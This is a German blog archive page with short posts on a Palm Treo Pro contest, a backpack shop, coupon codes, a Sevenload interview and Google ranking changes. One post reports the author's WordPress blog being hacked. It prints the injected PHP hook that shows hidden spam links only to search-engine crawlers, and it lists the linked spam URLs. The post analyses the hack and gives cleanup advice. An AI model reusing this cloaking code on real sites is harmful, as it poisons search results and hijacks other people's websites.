Das Treo Pro von Palm aus der Bloggeraktion von mitstil.com

Palm-treo-pro in

Bei der Bloggeraktion von mitstil.com gibt es als Hauptpreis ein Smartphone – genauer gesagt das „Treo Pro“ von Palm. Ein sehr stilvolles Handy – nein was sag ich – es ist mehr als nur ein Handy, es ist eigentlich ein Hochleistungsrechner im Taschenformat. Die Funktionsliste ließt sich wie ein Orgasmus der neuesten Technologien in eine Streichholzschachtel gesteckt.

Funktionen des Palm Treo Pro im Überblick

– Windows Mobile® 6.1 Professional
– Qualcomm® MSM7201 400 MHz
– Transflektiver TFT-Farb-Touchscreen (320 x 320)
– HSDPA/UMTS/EDGE/GPRS/GSM-Funktechnologie
– Tri-Band UMTS – 850 MHz, 1900 MHz, 2100 MHz
– Quad-Band GSM – 850/900/1800/1900
– 802.11b/g mit WPA-, WPA2- und 801.1.x-Authentisierung
– GPS integriert
– Version: 2.0 + Enhanced Data Rate
– 256 MB Speicher (100 MB verfügbar), 128 MB RAM
– 2,0 Megapixel, bis zu 8-facher Digitalzoom und Videofunktion
– Austauschbarer Lithium-Ionen-Akku (1500 mAh) mit
– bis zu 5 Stunden Sprechzeit und bis zu 250 Stunden Standby
– microSDHC-Karte (unterstützt bis zu 32 GB)
– MicroUSB 2.0 zum Synchronisieren und Aufladen
– 3,5-mm-Stereo-Headset-Anschluss
– 60 x 114 x 13,5 mm (B x L x T);

Das kleine Schwarze, passend zu jedem Anlass wiegt nur unglaubliche 133 Gramm. Für eine Hochleistungsrechenmaschine schon ein kleines Wunder.

Das Treo Pro smartphone by Palm ist eine perfekte Kombination aus E-Mail-Funktionen, Wi-Fi und GPS. Die Komplett – Tastatur und der große Farb – Touchscreen ermöglichen eine völlig unkomplizierte Bedienung. Bei diesem schlanken und eleganten Smartphone müssen Sie keinesfalls auf eine hohe Akkuleistung verzichten – es ist jederzeit und überall einsatzbereit.

Fazit von tecchannel
Der Treo Pro ist in jedem Fall ein aktuelles Smartphone, das locker mit anderen Windows-Mobile-Geräten mithalten kann. Palm steckt den Neuzugang in eine solide Hülle, insgesamt wirkt das Gerät sehr wertig. Bei der Tastatur muss man zwar gegenüber dem Vorgänger leichte Abstriche machen, dennoch ist sie immer noch gut. Das Display ist hell, Inhalte sind gut zu erkennen.

Mehr Informationen und meinen Beitrag zu der Bloggeraktion von mitstil.com findet ihr hier.

 

Günstige Rucksäcke bei Rucksack-Center.de

Rucksack-center in

Rucksack-Center.de - Online Shop

Der Rucksack Shop Rucksack-Center bietet zu günstigen Preisen Rucksäcke, Reisetaschen oder Notebook-Taschen an. Es werden ausschließlich Markenartikel verkauft darunter Marken wie Deuter, Eastpak oder Jansport. Die Auswahl an Rucksäcken und Taschen ist überschaubar und wesentlich billiger als im Kaufhaus.

Es besteht sogar die Möglichkeit einen 5 Euro Gutschein geschenkt zu bekommen, wenn man sich in den Newsletter auf der Seite einträgt. Es werden zusätzlich regelmäßig Gewinnspiele auf der Seite veranstaltet bei denen man Warengutscheine im Weert von 50 bis 100 Euro gewinnen kann.

Ein sehr guter online Shop mit kompetenten Mitarbeitern und einem guten Preis-Leistungs-Verhältnis.

 

Mediengestalter Blog gehackt und keiner hats gemerkt (WordPress Exploit)

Google-search-results-cloaking-wordpress-exploit-300x87 in

Der Mediengestalter-Weblog wurde durch einen fiesen Exploit von WordPress gehackt. Die Sicherheitslücke wurde von mir geschlossen leider aber sind mir durch diesen Hack die Suchmaschinenpositionen abgeraucht. Es handelt sich um ein Spam-Hack, der mir in den Footer diverse unsichtbare Links einfügte. Das besonders hinterlistige war allerdings, dass die Links ausschließlich für den Googlebot sichtbar waren und somit kaum gefunden werden konnten. Zusätzlich wurde mit CSS der Content mit display:none ausgeblendet. Die einfachste Möglichkeit den Spam zu entdecken ist sich den Google-Cache in Text-Version anzuschauen.

site:www.mediengestalter-weblog.de

Cloaking-footer-text-300x73 in

Eine weitere Methode den Spam zu entdecken, ist sich bei den Google Webmaster Tools anzumelden.

Google Webmaster Tools

Stutzig wurde ich, als ich gesehen habe, dass sich mein Blog laut Google Webmaster-Tools hauptsächlich mit dem Thema Viagra, Herbal oder Generic befassen soll.

Google-webmaster-tools-content-exploit-300x185 in

Ich kann jedem nur raten seine WordPress Version immer auf dem aktuellsten Stand zu halten. Die Cracker werden immer einfallsreicher und hinterlistiger. Somit konnte ich leider auch nicht heraus finden wer hinter dieser Attacke stand.

Bewerbung um eine Reinclusion bei Google

Ich werde heute noch einen Reinclusion Request bei Google starten.

Hier der Link unter dem man einen Reinclusion Request starten kann.

Footer Spam HTML


<div id="_wp_footer">
...
Über 300 Spam Links
...
</div>

Verlinkt wurde z.B. auf

http://itp.nyu.edu/%7Eja771/emp/index.php?catid=3710
http://web.honorscollege.cuny.edu/seminars/liu07/?ucla=300
http://web.honorscollege.cuny.edu/seminars/liu07/?ucla=466

Anhang

Den Linux by Examples Blog hat es auch erwischt. Hier konnte bisher auch keiner herausfinden, wer hinter diesen Hack steht.

Who is behind this?
Seriously We don’t know, but based on what we have, we make some guess, feel free to give yours.

From the spam injection, we observed that the spam links appended with a modified google adsense script with key pub-7652328300112263. Who’s key is that? Do he steal your income as well as messing your google index? Only google adsense team would able to answer this.

Tipp Google Bot Simulator:

Wer seine Seite nach unerwünschten Spam im Google-Index durchsuchen möchte, kann über den Google-Bot-Simulator seine Seite ansehen, wie sie der Googlebot sieht.

Wie wird man den Spam Hack wieder los?

Das ist leider nicht so einfach, da sich der Hack tief ins System frisst und nahezu überall seine Dateien hinterlegen kann. Daher empfehle ich eine komplett Neuinstallation von WordPress mit der aktuellsten Version. Dabei sollten alle bisher verwendeten Plugins gelöscht werden und neuinstalliert werden, da auch dort der Hack sein Unwesen getrieben haben kann.

Infizierte Orte können sein:

/wp-content/uploads
/wp-content/plugins
/wp-content/themes
/wp-includes
/wp-admin
/ etc...

Mit einigen Stunden Suche habe ich als einzigen Hinweis noch die Funktion „echo123“ entdeckt, welche über die WordPress-Funktion add_action() hinzugefügt wird.

add_action('wp_footer','wpc7c16b8466d864eeefd20050625c7775');
function
wpc7c16b8466d864eeefd20050625c7775() {
$seau=array("google","yahoo","slurp","msn","live","ask","altavista","aol");
$sebot=""; foreach($seau as $ua) if(strpos(strtolower($_SERVER['HTTP_USER_AGENT']),$ua)!==false){ $sebot="1"; break; }
if(!(
$sebot==1 && sizeof($_COOKIE)==0)) return;
@include(
'./wp-includes/class-mail.php');
if(
sizeof($wparr)>0){
echo
"<div id=\"_wp_footer\">";
foreach(
$wparr as $k=>$v){
echo
"<a href=\"".$v['url']."\" title=\"".ucwords($v['key'])."\">".ucwords($v['key'])."</a>\n";
if(
$i++==$inum) break;
}
echo
"</div>".$_footer;
}
}

Quellen und Tips zu diesem WordPress Link Spam Exploit:

http://www.village-idiot.org
http://technorati.com
http://googlewebmastercentral.blogspot.com
http://blogsecurity.net
http://playground.ebiene.de
http://www.teohuiming.name
http://www.prefblog.com

 

Spreadshirt Gutschein Code – 5 EUR & 7 EUR für 2007

Ich habe ein paar Spreadshirt Gutscheincodes gefunden. Die Gutscheine haben eine zeitliche Begrenzung und müssen am Ende des Bestellprozesses eingegeben werden. Viel Spaß damit!
Hier klicken und einlösen in

Gutschein Code für 7 EUR
MES7EUROS in

Gutschein für 5 EUR (bis 5. Juli 2007)
CHEAPFLAT4SHIRT in

Die Spreadshirt Gutschein Codes habe ich auf anderen Websites gefunden und wollte sie euch nicht vorenthalten.
 in

 

Sevenload arbeitet mit PHP, MySQL & Lighttpd (Lighty)

Sehr interessantes Interview vom Chefentwickler Thomas Bachem von Sevenload.de:

Am Montag traf ich Deutschlands wohl heißestes Web2.0 Startup im Bereich der Foto- und Video-Portale (entwickelt auf Basis von PHP und MySQL sowie lighttpd als Webserver) und schnappte mir Thomas Bachem, um ein wenig mehr über die Technik dahinter zu erfahren.

blog.thinkphp.de

Unser Chief Software Architect Thomas Bachem gab Rede und Antwort auf die Fragen in dem neuen Videointerview, welches auch als Start für kommende Interviewserien von Björn steht. Wir wünschen viel Erfolg für deine neue IT-Videoserie und bedanken uns herzlich dafür, dass wir die ersten in deiner Serie sein durften!

blog.sevenload.de

Björn Schotte ist einer der Geschäftsführer der Mayflower GmbH. Mayflower hilft uns die sevenload-Plattform schneller und besser zu machen und den stetig wachsenden technischen Anforderungen gerecht zu werden. Die jahrelange Erfahrung des Teams um Björn hilft uns, auch eine andere Perspektive auf unsere Plattform zu bekommen.

ibrahimevsan.de

Weitere Blogger-Stimmen zum Interview mit Tom unter:
sichelputzer.de
ralfeggert.de
basicthinking.de
dittes.info
blog.helmschrott.de

 

Google’s Juni Update: Massive SERPS Verschiebungen – Eine Zusammenfassung

Gestern Nacht vom 27. Juni auf den 28. Juni 2006 hat Google weit reichende Änderungen in der Bewertung vieler Seiten live gestellt. Meine Seite ist leider auch (negativ) davon betroffen und so kam es, dass gestern nur noch ein Zehntel des sonstigen Suchmaschinen-Traffics bekommen habe.
Google Update – Abfall der Besucher ueber Suchmaschinen
Die Grafik zeigt den massiven Abfall der Besucher über Suchmaschinen seit gestern (28. Juni 2006) auf meinem Blog. ( 95% weniger Besucher über Google)
Das Thema wird bereits heiß diskutiert und einige wenige Leute haben bereits ihre persönlichen Erfahrungen zu diesem Juni Update gebloggt, das (zufällig?) genau in der WM-Fußballpause statt gefunden hat.
Auf meinem Blog sind die Änderungen auf allen Datencentern gleichermaßen aktiv geworden, daher kann ich die Theorie nicht bestätigen, dass nur auf einigen Datencentern ein neuer Algo getestet wird.
Das SEO-Radio meint, solch massive Verschiebungen hat es zuletzt beim Florida Update vor einigen Jahren gegeben.
Da meine Seite direkt von diesem Update betroffen ist, habe ich mich weit reichend informiert und die Wesentlichen Ausagen im Netz zum Google Update in Zitatform und Links zur Quelle zusammengestellt. Ich hoffe es hilft euch weiter, vielleicht habt ihr noch ein paar Ergänzungen und Erfahrungen, die ihr in den Kommentaren loswerden könnt.

 

Ist Simyo mit Internettelefonie und Daten-Flatrate bald Web 2.0 ?

Die Sub-Marke Simyo von E-Plus hat ein erfolgreiches erstes Jahr hinter sich. Doch der Mobilfunkmarkt befindet sich im Wandel. Im Gespräch mit Golem.de erläuterte Rolf Hansen, Geschäftsführer bei Simyo, die Pläne für die Zukunft. Für ihn sind Internettelefonie und Daten-Flatrate in Zukunft nicht ausgeschlossen, derzeit ist dafür die E-Plus-Marke Basezuständig.

 

Volker Glaeser von Yahoo bei Next10Years zum Thema Web 2.0

Mich konnte der Herr Volker Glaeser in der Session “Don´t Make Me Think: Von der Kunst, neue Dienste zu etablieren” nicht wirklich überzeugen. Für mich war das reine Selbstbeweihräucherung wie “cool” Yahoo doch sei und dass Yahoo ach so toll in vielen Bereichen Marktführer ist… UND (ich vergaß) die “WELTWEIT größte Online-Plattform” sei. Wie kann man nur so selbstverliebt sein ? Leider liefert Volker Glaeser keine wirklich neuen Informationen zum Thema Web 2.0 und Timo von Törne (Skype) hat sich sichtlich unwohl neben seinem Vortragspartner gefühlt.